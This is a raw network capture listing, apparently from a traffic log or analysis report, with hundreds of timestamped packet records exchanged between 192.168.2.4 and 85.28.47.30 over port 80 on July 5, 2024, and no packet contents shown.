                                                                Jul 5, 2024 04:36:00.070655107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070674896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070682049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070699930 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070700884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070717096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070720911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070734024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070738077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070749998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070758104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070769072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070774078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070785046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070792913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070801020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070807934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070827007 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070831060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070847988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070859909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070869923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070874929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070893049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070893049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.070923090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.070941925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.071436882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.071450949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.071466923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.071481943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.071484089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.071497917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.071511984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.071516037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.071540117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.071542978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.071556091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.071568966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.071573973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.071602106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.071645021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.071726084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.071742058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.071772099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.071789026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.072079897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.072097063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.072140932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.072177887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.072202921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.072217941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.072227955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.072232962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.072248936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.072251081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.072264910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.072268009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.072276115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.072280884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.072297096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.072300911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.072309017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.072333097 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.072340965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.147876024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.147896051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.147917032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.147923946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.147929907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.147936106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.147944927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.147974014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148015976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148032904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148047924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148050070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148058891 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148066044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148073912 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148086071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148091078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148109913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148139954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148185968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148201942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148217916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148236036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148241043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148245096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148257971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148263931 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148276091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148284912 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148298025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148318052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148509979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148525953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148542881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148557901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148561954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148571014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148576975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148591042 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148607016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148619890 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148648977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148665905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148689032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148689032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148706913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148716927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148745060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148745060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148813009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.148873091 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.148967981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.149019003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153145075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153160095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153173923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153191090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153198957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153206110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153213978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153224945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153240919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153251886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153275013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153278112 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153289080 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153292894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153310061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153317928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153326988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153328896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153345108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153350115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153362989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153373957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153378963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153393984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153394938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153402090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153424025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153429031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153440952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153450966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153466940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153470039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153485060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153491974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153501034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153511047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153517008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153521061 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153536081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153542042 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153552055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153552055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153568983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153578997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153584003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153594017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153599977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153611898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153615952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153624058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153637886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153647900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153656006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153666019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153678894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153680086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.153696060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.153721094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.161652088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.161667109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.161727905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.161773920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.161789894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.161822081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.161848068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.161938906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.161956072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.161971092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.161987066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.161988020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162002087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162003040 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162019014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162033081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162059069 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162089109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162103891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162118912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162134886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162136078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162152052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162153006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162168980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162168980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162200928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162209988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162270069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162307024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162415981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162432909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162467957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162478924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162601948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162616968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162631989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162647963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162647963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162662983 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162688971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162694931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162719011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162736893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162740946 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162751913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162760019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162772894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162774086 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162794113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162797928 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162817001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162822008 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162842035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162853956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162858963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162873983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162883043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162883043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162889957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162904978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162904978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162921906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162929058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162935972 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162945032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162957907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162961006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.162977934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.162986040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163003922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163003922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163021088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163031101 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163037062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163049936 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163053989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163063049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163070917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163085938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163085938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163103104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163115978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163115978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163120985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163125038 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163137913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163156986 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163163900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163184881 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163259983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163300991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163336039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163351059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163366079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163379908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163392067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163414001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163693905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163710117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.163737059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.163749933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.164414883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.164431095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.164469957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.236728907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.236794949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.236808062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.236824989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.236849070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.236860991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.236871958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.236876965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.236905098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.236915112 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.236921072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.236931086 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.236947060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.236958027 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.236999989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237015009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237030029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237040997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237046003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237057924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237071991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237076044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237083912 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237087011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237102985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237119913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237133026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237135887 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237135887 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237148046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237163067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237174034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237179041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237188101 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237195015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237205982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237221003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237238884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237245083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237258911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237276077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237292051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237330914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237344980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237363100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237396002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237396002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237396002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237423897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237440109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237456083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237467051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237471104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237487078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237487078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.237498045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237514973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.237526894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.243716002 CEST804973085.28.47.30192.168.2.4
